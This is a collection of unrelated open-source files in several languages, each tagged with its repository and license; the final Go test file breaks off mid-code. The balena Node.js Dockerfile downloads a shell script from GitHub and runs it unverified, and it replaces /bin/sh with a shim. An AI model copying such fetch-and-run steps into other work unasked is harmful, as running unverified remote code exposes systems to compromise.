private function _invoke($actionName)
{
return $xml = file_get_contents(dirname(__FILE__) . '/Mock/' . $actionName . 'Response.xml',
/** search include path */
true);
}
}
| brickfox/mws | src/MarketplaceWebServiceSellers/Mock.php | PHP | apache-2.0 | 4,108 |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace Trifolia.DB
{
public enum Conformance
{
SHALL = 1,
SHALL_NOT = 2,
SHOULD = 3,
SHOULD_NOT = 4,
MAY = 5,
MAY_NOT = 6,
UNKNOWN = 999
}
}
| lantanagroup/trifolia | Trifolia.DB/Conformance.cs | C# | apache-2.0 | 302 |
package com.ctrip.xpipe.redis.checker.alert.manager;
import com.ctrip.xpipe.redis.checker.alert.ALERT_TYPE;
import com.ctrip.xpipe.redis.checker.alert.AlertChannel;
import com.ctrip.xpipe.redis.checker.alert.AlertConfig;
import com.ctrip.xpipe.redis.checker.alert.AlertEntity;
import com.ctrip.xpipe.redis.checker.alert.message.AlertEntityHolderManager;
import com.ctrip.xpipe.redis.checker.alert.policy.channel.ChannelSelector;
import com.ctrip.xpipe.redis.checker.alert.policy.channel.DefaultChannelSelector;
import com.ctrip.xpipe.redis.checker.alert.policy.receiver.*;
import com.ctrip.xpipe.redis.checker.alert.policy.timing.RecoveryTimeSlotControl;
import com.ctrip.xpipe.redis.checker.alert.policy.timing.TimeSlotControl;
import com.ctrip.xpipe.redis.checker.config.CheckerDbConfig;
import com.ctrip.xpipe.redis.core.meta.MetaCache;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import javax.annotation.PostConstruct;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.TimeUnit;
import java.util.function.LongSupplier;
/**
* @author chen.zhu
* <p>
* Oct 18, 2017
*/
@Component
public class AlertPolicyManager {
@Autowired
private AlertConfig alertConfig;
@Autowired
private CheckerDbConfig checkerDbConfig;
@Autowired
private MetaCache metaCache;
private EmailReceiver emailReceiver;
private GroupEmailReceiver groupEmailReceiver;
private ChannelSelector channelSelector;
private TimeSlotControl recoveryTimeController;
@PostConstruct
public void initPolicies() {
emailReceiver = new DefaultEmailReceiver(alertConfig, checkerDbConfig, metaCache);
groupEmailReceiver = new DefaultGroupEmailReceiver(alertConfig, checkerDbConfig, metaCache);
channelSelector = new DefaultChannelSelector();
if(recoveryTimeController == null) {
recoveryTimeController = new RecoveryTimeSlotControl(alertConfig);
}
}
public List<AlertChannel> queryChannels(AlertEntity alert) {
return channelSelector.alertChannels(alert);
}
public long queryRecoverMilli(AlertEntity alert) {
return recoveryTimeController.durationMilli(alert);
}
public long querySuspendMilli(AlertEntity alert) {
return TimeUnit.MINUTES.toMillis(alertConfig.getAlertSystemSuspendMinute());
}
public EmailReceiverModel queryEmailReceivers(AlertEntity alert) {
return emailReceiver.receivers(alert);
}
public void markCheckInterval(ALERT_TYPE alertType, LongSupplier checkInterval) {
if(recoveryTimeController == null) {
recoveryTimeController = new RecoveryTimeSlotControl(alertConfig);
}
recoveryTimeController.mark(alertType, checkInterval);
}
public Map<EmailReceiverModel, Map<ALERT_TYPE, Set<AlertEntity>>> queryGroupedEmailReceivers(
AlertEntityHolderManager alerts) {
return groupEmailReceiver.getGroupedEmailReceiver(alerts);
}
}
| ctripcorp/x-pipe | redis/redis-checker/src/main/java/com/ctrip/xpipe/redis/checker/alert/manager/AlertPolicyManager.java | Java | apache-2.0 | 3,064 |
package com.coolweather.android.util;
import okhttp3.OkHttpClient;
import okhttp3.Request;
/**
* Created by fengj on 2017/1/27.
*/
public class HttpUtil {
public static void sendOkHttpRequest(String address,okhttp3.Callback callback){
OkHttpClient client=new OkHttpClient();
Request request=new Request.Builder().url(address).build();
client.newCall(request).enqueue(callback);
}
}
| cabbagemaoyi/coolweather | app/src/main/java/com/coolweather/android/util/HttpUtil.java | Java | apache-2.0 | 419 |
# Copyright 2018 Flight Lab authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library for network related helpers."""
import socket
def get_ip():
"""Get primary IP (the one with a default route) of local machine.
This works on both Linux and Windows platforms, and doesn't require working
internet connection.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
return s.getsockname()[0]
except:
return '127.0.0.1'
finally:
s.close()
| google/flight-lab | controller/common/net.py | Python | apache-2.0 | 1,062 |
/*
* Copyright 2013
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
package org.openntf.domino.iterators;
import java.util.Iterator;
import org.openntf.domino.Base;
import org.openntf.domino.Database;
import org.openntf.domino.DocumentCollection;
import org.openntf.domino.Session;
import org.openntf.domino.View;
import org.openntf.domino.ViewEntryCollection;
import org.openntf.domino.utils.DominoUtils;
import org.openntf.domino.utils.Factory;
// TODO: Auto-generated Javadoc
/**
* The Class AbstractDominoIterator.
*
* @param <T>
* the generic type
*/
public abstract class AbstractDominoIterator<T> implements Iterator<T> {
/** The server name_. */
private String serverName_;
/** The file path_. */
private String filePath_;
/** The collection_. */
private Base<?> collection_;
/** The session_. */
private transient Session session_;
/** The database_. */
private transient Database database_;
/**
* Instantiates a new abstract domino iterator.
*
* @param collection
* the collection
*/
protected AbstractDominoIterator(final Base<?> collection) {
setCollection(collection);
}
/**
* Gets the session.
*
* @return the session
*/
protected Session getSession() {
if (session_ == null) {
try {
session_ = Factory.getSession();
} catch (Throwable e) {
DominoUtils.handleException(e);
return null;
}
}
return session_;
}
/**
* Gets the database.
*
* @return the database
*/
protected Database getDatabase() {
if (database_ == null) {
Session session = getSession();
try {
database_ = session.getDatabase(getServerName(), getFilePath());
} catch (Throwable e) {
DominoUtils.handleException(e);
return null;
}
}
return database_;
}
/**
* Gets the file path.
*
* @return the file path
*/
protected String getFilePath() {
return filePath_;
}
/**
* Gets the server name.
*
* @return the server name
*/
protected String getServerName() {
return serverName_;
}
/**
* Sets the database.
*
* @param database
* the new database
*/
protected void setDatabase(final Database database) {
if (database != null) {
try {
setFilePath(database.getFilePath());
setServerName(database.getServer());
} catch (Throwable e) {
DominoUtils.handleException(e);
}
}
}
/**
* Sets the file path.
*
* @param filePath
* the new file path
*/
protected void setFilePath(final String filePath) {
filePath_ = filePath;
}
/**
* Sets the server name.
*
* @param serverName
* the new server name
*/
protected void setServerName(final String serverName) {
serverName_ = serverName;
}
/**
* Gets the collection.
*
* @return the collection
*/
public Base<?> getCollection() {
return collection_;
}
/**
* Sets the collection.
*
* @param collection
* the new collection
*/
public void setCollection(final Base<?> collection) {
if (collection != null) {
if (collection instanceof DocumentCollection) {
org.openntf.domino.Database parent = ((org.openntf.domino.DocumentCollection) collection).getParent();
session_ = Factory.fromLotus(parent.getParent(), Session.SCHEMA, null); // FIXME NTF - this is suboptimal,
database_ = Factory.fromLotus(parent, Database.SCHEMA, session_);
// but we still need to
// sort out the parent/child pattern
} else if (collection instanceof ViewEntryCollection) {
View vw = ((ViewEntryCollection) collection).getParent();
database_ = vw.getParent();
session_ = Factory.getSession(database_);
}
if (database_ != null) {
setDatabase(database_);
}
}
collection_ = collection;
}
}
| mariusj/org.openntf.domino | domino/core/archive/AbstractDominoIterator.java | Java | apache-2.0 | 4,458 |
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Class triagens\ArangoDb\Vertex | ArangoDB-PHP API Documentation</title>
<link rel="stylesheet" href="resources/bootstrap.min.css?973e37a8502921d56bc02bb55321f45b072b6f71">
<link rel="stylesheet" href="resources/style.css?49f43d3208c5d7e33fa16d36107a345bf11cc00d">
</head>
<body>
<nav id="navigation" class="navbar navbar-default navbar-fixed-top">
<div class="container-fluid">
<div class="navbar-header">
<a href="index.html" class="navbar-brand">ArangoDB-PHP API Documentation</a>
</div>
<div class="collapse navbar-collapse">
<form id="search" class="navbar-form navbar-left" role="search">
<input type="hidden" name="cx" value="">
<input type="hidden" name="ie" value="UTF-8">
<div class="form-group">
<input type="text" name="q" class="search-query form-control" placeholder="Search">
</div>
</form>
<ul class="nav navbar-nav">
<li>
<a href="namespace-triagens.ArangoDb.html" title="Summary of triagens\ArangoDb"><span>Namespace</span></a>
</li>
<li class="active">
<span>Class</span> </li>
<li class="divider-vertical"></li>
<li>
<a href="annotation-group-deprecated.html" title="List of elements with deprecated annotation">
<span>Deprecated</span>
</a>
</li>
</ul>
</div>
</div>
</nav>
<div id="left">
<div id="menu">
<div id="groups">
<h3>Namespaces</h3>
<ul>
<li class="active">
<a href="namespace-triagens.html">
triagens<span></span>
</a>
<ul>
<li class="active">
<a href="namespace-triagens.ArangoDb.html">
ArangoDb </a>
</li>
</ul></li>
</ul>
</div>
<div id="elements">
<h3>Classes</h3>
<ul>
<li><a href="class-triagens.ArangoDb.AdminHandler.html">AdminHandler</a></li>
<li><a href="class-triagens.ArangoDb.AqlUserFunction.html">AqlUserFunction</a></li>
<li><a href="class-triagens.ArangoDb.Autoloader.html">Autoloader</a></li>
<li><a href="class-triagens.ArangoDb.Batch.html">Batch</a></li>
<li><a href="class-triagens.ArangoDb.BatchPart.html">BatchPart</a></li>
<li><a href="class-triagens.ArangoDb.BindVars.html">BindVars</a></li>
<li><a href="class-triagens.ArangoDb.Collection.html">Collection</a></li>
<li><a href="class-triagens.ArangoDb.CollectionHandler.html">CollectionHandler</a></li>
<li><a href="class-triagens.ArangoDb.Connection.html">Connection</a></li>
<li><a href="class-triagens.ArangoDb.ConnectionOptions.html">ConnectionOptions</a></li>
<li><a href="class-triagens.ArangoDb.Cursor.html">Cursor</a></li>
<li><a href="class-triagens.ArangoDb.Database.html">Database</a></li>
<li><a href="class-triagens.ArangoDb.DefaultValues.html">DefaultValues</a></li>
<li><a href="class-triagens.ArangoDb.Document.html">Document</a></li>
<li><a href="class-triagens.ArangoDb.DocumentHandler.html">DocumentHandler</a></li>
<li><a href="class-triagens.ArangoDb.Edge.html">Edge</a></li>
<li><a href="class-triagens.ArangoDb.EdgeDefinition.html">EdgeDefinition</a></li>
<li><a href="class-triagens.ArangoDb.EdgeHandler.html">EdgeHandler</a></li>
<li><a href="class-triagens.ArangoDb.Endpoint.html">Endpoint</a></li>
<li><a href="class-triagens.ArangoDb.Export.html">Export</a></li>
<li><a href="class-triagens.ArangoDb.ExportCursor.html">ExportCursor</a></li>
<li><a href="class-triagens.ArangoDb.Graph.html">Graph</a></li>
<li><a href="class-triagens.ArangoDb.GraphHandler.html">GraphHandler</a></li>
<li><a href="class-triagens.ArangoDb.Handler.html">Handler</a></li>
<li><a href="class-triagens.ArangoDb.HttpHelper.html">HttpHelper</a></li>
<li><a href="class-triagens.ArangoDb.HttpResponse.html">HttpResponse</a></li>
<li><a href="class-triagens.ArangoDb.QueryCacheHandler.html">QueryCacheHandler</a></li>
<li><a href="class-triagens.ArangoDb.QueryHandler.html">QueryHandler</a></li>
<li><a href="class-triagens.ArangoDb.Statement.html">Statement</a></li>
<li><a href="class-triagens.ArangoDb.TraceRequest.html">TraceRequest</a></li>
<li><a href="class-triagens.ArangoDb.TraceResponse.html">TraceResponse</a></li>
<li><a href="class-triagens.ArangoDb.Transaction.html">Transaction</a></li>
<li><a href="class-triagens.ArangoDb.Traversal.html">Traversal</a></li>
<li><a href="class-triagens.ArangoDb.UpdatePolicy.html">UpdatePolicy</a></li>
<li><a href="class-triagens.ArangoDb.UrlHelper.html">UrlHelper</a></li>
<li><a href="class-triagens.ArangoDb.Urls.html">Urls</a></li>
<li><a href="class-triagens.ArangoDb.User.html">User</a></li>
<li><a href="class-triagens.ArangoDb.UserHandler.html">UserHandler</a></li>
<li><a href="class-triagens.ArangoDb.ValueValidator.html">ValueValidator</a></li>
<li class="active"><a href="class-triagens.ArangoDb.Vertex.html">Vertex</a></li>
<li><a href="class-triagens.ArangoDb.VertexHandler.html">VertexHandler</a></li>
</ul>
<h3>Exceptions</h3>
<ul>
<li><a href="class-triagens.ArangoDb.ClientException.html">ClientException</a></li>
<li><a href="class-triagens.ArangoDb.ConnectException.html">ConnectException</a></li>
<li><a href="class-triagens.ArangoDb.Exception.html">Exception</a></li>
<li><a href="class-triagens.ArangoDb.ServerException.html">ServerException</a></li>
</ul>
</div>
</div>
</div>
<div id="splitter"></div>
<div id="right">
<div id="rightInner">
<div id="content" class="class">
<h1>Class Vertex</h1>
<div class="description">
<p>Value object representing a single vertex document</p>
</div>
<dl class="tree well">
<dd style="padding-left:0px">
<a href="class-triagens.ArangoDb.Document.html"><span>triagens\ArangoDb\Document</span></a>
</dd>
<dd style="padding-left:30px">
<img src="resources/inherit.png" alt="Extended by">
<b><span>triagens\ArangoDb\Vertex</span></b>
</dd>
</dl>
<div class="alert alert-info">
<b>Namespace:</b> <a href="namespace-triagens.html">triagens</a>\<a href="namespace-triagens.ArangoDb.html">ArangoDb</a><br>
<b>Package:</b> triagens\ArangoDb<br>
<b>Since:</b>
1.2<br>
<b>Located at</b> <a href="source-class-triagens.ArangoDb.Vertex.html#15-25" title="Go to source code">Vertex.php</a>
<br>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h2>Methods summary</h2></div>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h3>Methods inherited from <a href="class-triagens.ArangoDb.Document.html#methods">triagens\ArangoDb\Document</a></h3></div>
<p class="elementList">
<code><a href="class-triagens.ArangoDb.Document.html#___clone">__clone()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___construct">__construct()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___get">__get()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___isset">__isset()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___set">__set()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___toString">__toString()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#___unset">__unset()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_createFromArray">createFromArray()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_filterHiddenAttributes">filterHiddenAttributes()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_get">get()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getAll">getAll()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getAllAsObject">getAllAsObject()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getAllForInsertUpdate">getAllForInsertUpdate()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getChanged">getChanged()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getCollectionId">getCollectionId()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getHandle">getHandle()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getHiddenAttributes">getHiddenAttributes()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getId">getId()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getInternalId">getInternalId()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getInternalKey">getInternalKey()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getIsNew">getIsNew()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getKey">getKey()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_getRevision">getRevision()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_isIgnoreHiddenAttributes">isIgnoreHiddenAttributes()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_set">set()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setChanged">setChanged()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setHiddenAttributes">setHiddenAttributes()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setIgnoreHiddenAttributes">setIgnoreHiddenAttributes()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setInternalId">setInternalId()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setInternalKey">setInternalKey()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setIsNew">setIsNew()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_setRevision">setRevision()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_toJson">toJson()</a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#_toSerialized">toSerialized()</a></code>
</p>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h2>Constants summary</h2></div>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h3>Constants inherited from <a href="class-triagens.ArangoDb.Document.html#constants">triagens\ArangoDb\Document</a></h3></div>
<p class="elementList">
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_HIDDENATTRIBUTES"><b>ENTRY_HIDDENATTRIBUTES</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_ID"><b>ENTRY_ID</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_IGNOREHIDDENATTRIBUTES"><b>ENTRY_IGNOREHIDDENATTRIBUTES</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_ISNEW"><b>ENTRY_ISNEW</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_KEY"><b>ENTRY_KEY</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#ENTRY_REV"><b>ENTRY_REV</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#OPTION_KEEPNULL"><b>OPTION_KEEPNULL</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#OPTION_POLICY"><b>OPTION_POLICY</b></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#OPTION_WAIT_FOR_SYNC"><b>OPTION_WAIT_FOR_SYNC</b></a></code>
</p>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h2>Properties summary</h2></div>
</div>
<div class="panel panel-default">
<div class="panel-heading"><h3>Properties inherited from <a href="class-triagens.ArangoDb.Document.html#properties">triagens\ArangoDb\Document</a></h3></div>
<p class="elementList">
<code><a href="class-triagens.ArangoDb.Document.html#$_changed"><var>$_changed</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_doValidate"><var>$_doValidate</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_hiddenAttributes"><var>$_hiddenAttributes</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_id"><var>$_id</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_ignoreHiddenAttributes"><var>$_ignoreHiddenAttributes</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_isNew"><var>$_isNew</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_key"><var>$_key</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_rev"><var>$_rev</var></a></code>,
<code><a href="class-triagens.ArangoDb.Document.html#$_values"><var>$_values</var></a></code>
</p>
</div>
</div>
</div>
<div id="footer">
ArangoDB-PHP API Documentation API documentation generated by <a href="http://apigen.org">ApiGen</a>
</div>
</div>
<script src="resources/combined.js"></script>
<script src="elementlist.js"></script>
</body>
</html>
| diabl0/arangodb-php | docs/class-triagens.ArangoDb.Vertex.html | HTML | apache-2.0 | 13,104 |
'use strict';
var chai = require('chai');
var promised = require('chai-as-promised');
chai.use(promised);
global.expect = chai.expect;
exports.config = {
// The timeout for each script run on the browser. This should be longer
// than the maximum time your application needs to stabilize between tasks.
allScriptsTimeout: 15000,
// Capabilities to be passed to the webdriver instance.
capabilities: {
'browserName': 'chrome',
'loggingPrefs': {
'browser': 'ALL'
}
},
// ----- What tests to run -----
//
// Spec patterns are relative to the location of the spec file. They may
// include glob patterns.
specs: [
'admin/specs/admin-user-spec.js',
'admin/specs/users-spec.js',
'admin/specs/groups-spec.js',
'admin/specs/system-spec.js',
'admin/specs/authorizations-spec.js',
'cockpit/specs/dashboard-spec.js',
'cockpit/specs/process-definition-spec.js',
'cockpit/specs/decision-definition-spec.js',
'cockpit/specs/process-instance-spec.js',
'cockpit/specs/process-definition-filter-spec.js',
'cockpit/specs/variable-spec.js',
'cockpit/specs/suspension-spec.js',
'tasklist/specs/filter-basic-spec.js',
'tasklist/specs/filter-permissions-spec.js',
'tasklist/specs/filter-criteria-spec.js',
'tasklist/specs/filter-vg-spec.js',
'tasklist/specs/process-stariables-spec.js',
'tasklist/specs/task-claiminart-spec.js',
'tasklist/specs/tasklist-sorting-spec.js',
'tasklist/specs/tasklist-search-spec.js',
'tasklist/specs/task-detail-view-spec.js',
'tasklist/specs/task-dates-spec.js'
],
// A base URL for your application under test. Calls to protractor.get()
// with relative paths will be prepended with this.
baseUrl: 'http://localhost:8080',
// ----- The test framework -----
//
// Jasmine is fully supported as a test and assertion framework.
// Mocha has limited beta support. You will need to include your own
// assertion framework if working with mocha.
framework: 'mocha',
// ----- Options to be passed to minijasminenode -----
//
// Options to be passed to Mocha-node.
// See the full list at https://github.com/juliemr/minijasminenode
mochaOpts: {
timeout: 15000,
colors: false,
reporter: 'xunit-file',
slow: 3000
}
};
| jangalinski/camunda-bpm-webapp | webapp/src/test/js/e2e/ci.conf.js | JavaScript | apache-2.0 | 2,310 |
# AUTOGENERATED FILE
FROM balenalib/zc702-zynq7-ubuntu:cosmic-build
ENV NODE_VERSION 12.20.1
ENV YARN_VERSION 1.22.4
RUN for key in \
6A010C5166006599AA17F08146C2130DFD2497F5 \
; do \
gpg --keyserver pgp.mit.edu --recv-keys "$key" || \
gpg --keyserver keyserver.pgp.com --recv-keys "$key" || \
gpg --keyserver ha.pool.sks-keyservers.net --recv-keys "$key" ; \
done \
&& curl -SLO "http://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION-linux-armv7l.tar.gz" \
&& echo "7283ced5d7c0cc036a35bc2e64b23e7d4b348848170567880edabcf5279f4f8a node-v$NODE_VERSION-linux-armv7l.tar.gz" | sha256sum -c - \
&& tar -xzf "node-v$NODE_VERSION-linux-armv7l.tar.gz" -C /usr/local --strip-components=1 \
&& rm "node-v$NODE_VERSION-linux-armv7l.tar.gz" \
&& curl -fSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" \
&& curl -fSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" \
&& gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz \
&& mkdir -p /opt/yarn \
&& tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/yarn --strip-components=1 \
&& ln -s /opt/yarn/bin/yarn /usr/local/bin/yarn \
&& ln -s /opt/yarn/bin/yarn /usr/local/bin/yarnpkg \
&& rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz \
&& npm config set unsafe-perm true -g --unsafe-perm \
&& rm -rf /tmp/*
CMD ["echo","'No CMD command was set in Dockerfile! Details about CMD command could be found in Dockerfile Guide section in our Docs. Here's the link: https://balena.io/docs"]
RUN curl -SLO "https://raw.githubusercontent.com/balena-io-library/base-images/8accad6af708fca7271c5c65f18a86782e19f877/scripts/assets/tests/[email protected]" \
&& echo "Running test-stack@node" \
&& chmod +x [email protected] \
&& bash [email protected] \
&& rm -rf [email protected]
RUN [ ! -d /.balena/messages ] && mkdir -p /.balena/messages; echo 'Here are a few details about this Docker image (For more information please visit https://www.balena.io/docs/reference/base-images/base-images/): \nArchitecture: ARM v7 \nOS: Ubuntu cosmic \nVariant: build variant \nDefault variable(s): UDEV=off \nThe following software stack is preinstalled: \nNode.js v12.20.1, Yarn v1.22.4 \nExtra features: \n- Easy way to install packages with `install_packages <package-name>` command \n- Run anywhere with cross-build feature (for ARM only) \n- Keep the container idling with `balena-idle` command \n- Show base image details with `balena-info` command' > /.balena/messages/image-info
RUN echo '#!/bin/sh.real\nbalena-info\nrm -f /bin/sh\ncp /bin/sh.real /bin/sh\n/bin/sh "$@"' > /bin/sh-shim \
&& chmod +x /bin/sh-shim \
&& cp /bin/sh /bin/sh.real \
&& mv /bin/sh-shim /bin/sh | nghiant2710/base-images | balena-base-images/node/zc702-zynq7/ubuntu/cosmic/12.20.1/build/Dockerfile | Dockerfile | apache-2.0 | 2,764 |
bluebook
========
A simple encrypted notepad application using Java Swing and GNU Crypto.
###Build
The repo contains a NetBeans project (last tested version: 7.1.2). GUI portions of the code are auto-generated by NetBeans' GUI Swing builder, Matisse. To build, open the project in NetBeans and click _Run > Build Project_. To build on the command line, type `ant jar` in the project's root directory. In either case, the runnable _bluebook.jar_ file and its associated _lib_ directory will be created in the project's _dist_ subdirectory.
###Run
To run, type `java -jar bluebook.jar`. AES-256 encrypted data are stored in the file _bluebook.data_, which will be created in the current directory if it does not already exist.
* In plaintext mode, click the notepad/pencil icon to enable editing. The text area's background color will change from grey to blue when something has been modified.
* To encrypt and save after editing, enter your password in the password field, click the lock button, then confirm your password when prompted. (NB: Since the password is never stored, bluebook will encrypt using any password you type twice!)
* To decrypt, enter your password and click the magnifying-glass button.
###License
The original contents of this repository are released under the [Apache 2.0](http://www.apache.org/licenses/LICENSE-2.0) license. See the LICENSE file for details. The GNU Crypto library is distributed under the terms of the GPL (specifically, GPLv2 3(c) / GPLv3 6(c), allowing for distribution of object code); see the README*, LICENSE and COPYING files in the gnu-crypto-2.0.1-bin subdirectory for details and for instructions on obtaining source code.
###Thanks
Thanks to the [Tango Desktop Project](http://tango.freedesktop.org/Tango_Desktop_Project) for public-domain icons and to the [GNU Crypto](http://www.gnu.org/software/gnu-crypto) team. | maddenp/bluebook | README.md | Markdown | apache-2.0 | 1,881 |
/*
* Copyright (c) 2015 IRCCloud, Ltd.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.irccloud.android.fragment;
import android.app.Dialog;
import android.content.Context;
import android.content.DialogInterface;
import android.os.Bundle;
import android.text.SpannableStringBuilder;
import android.text.Spanned;
import android.text.method.ScrollingMovementMethod;
import android.text.style.TabStopSpan;
import android.view.LayoutInflater;
import android.view.View;
import android.widget.TextView;
import androidx.appcompat.app.AlertDialog;
import androidx.fragment.app.DialogFragment;
import com.irccloud.android.R;
import com.irccloud.android.activity.MainActivity;
public class TextListFragment extends DialogFragment {
private TextView textView;
private String title = null;
private String text = null;
public boolean dismissed = false;
public String type;
@Override
public Dialog onCreateDialog(Bundle savedInstanceState) {
Context ctx = getActivity();
if(ctx == null)
return null;
LayoutInflater inflater = (LayoutInflater) ctx.getSystemService(Context.LAYOUT_INFLATER_SERVICE);
View v = inflater.inflate(R.layout.dialog_textlist, null);
textView = v.findViewById(R.id.textView);
textView.setHorizontallyScrolling(true);
textView.setMovementMethod(new ScrollingMovementMethod());
if (savedInstanceState != null && savedInstanceState.containsKey("text")) {
text = savedInstanceState.getString("text");
}
if(text != null) {
setText(text);
}
Dialog d = new AlertDialog.Builder(ctx)
.setView(v)
.setTitle(title)
.setNegativeButton("Close", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
dialog.dismiss();
}
})
.create();
return d;
}
@Override
public void onDismiss(DialogInterface dialog) {
super.onDismiss(dialog);
dismissed = true;
if(getActivity() != null && ((MainActivity)getActivity()).help_fragment == this)
((MainActivity)getActivity()).help_fragment = null;
}
@Override
public void onCancel(DialogInterface dialog) {
super.onCancel(dialog);
dismissed = true;
if(getActivity() != null && ((MainActivity)getActivity()).help_fragment == this)
((MainActivity)getActivity()).help_fragment = null;
}
@Override
public void onSaveInstanceState(Bundle state) {
state.putString("text", text);
}
public void refresh() {
Bundle args = getArguments();
if(args.containsKey("title")) {
title = args.getString("title");
if(getDialog() != null)
getDialog().setTitle(title);
}
if(args.containsKey("text")) {
text = args.getString("text");
if(textView != null)
setText(text);
}
}
private void setText(String text) {
SpannableStringBuilder sb = new SpannableStringBuilder(text);
for (int i = 0; i < 100; i++)
sb.setSpan(new TabStopSpan.Standard(i * 300), 0, sb.length(), Spanned.SPAN_EXCLUSIVE_EXCLUSIVE);
textView.setText(sb, TextView.BufferType.SPANNABLE);
}
@Override
public void setArguments(Bundle args) {
super.setArguments(args);
refresh();
}
@Override
public void onPause() {
super.onPause();
}
}
| irccloud/android | src/com/irccloud/android/fragment/TextListFragment.java | Java | apache-2.0 | 4,169 |
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package log
import (
"fmt"
"strings"
"testing"
"time"
"github.com/stretchr/testify/assert"
"github.com/adfin/statster/metrics/core"
)
func TestSimpleWrite(t *testing.T) {
now := time.Now()
batch := core.DataBatch{
Timestamp: now,
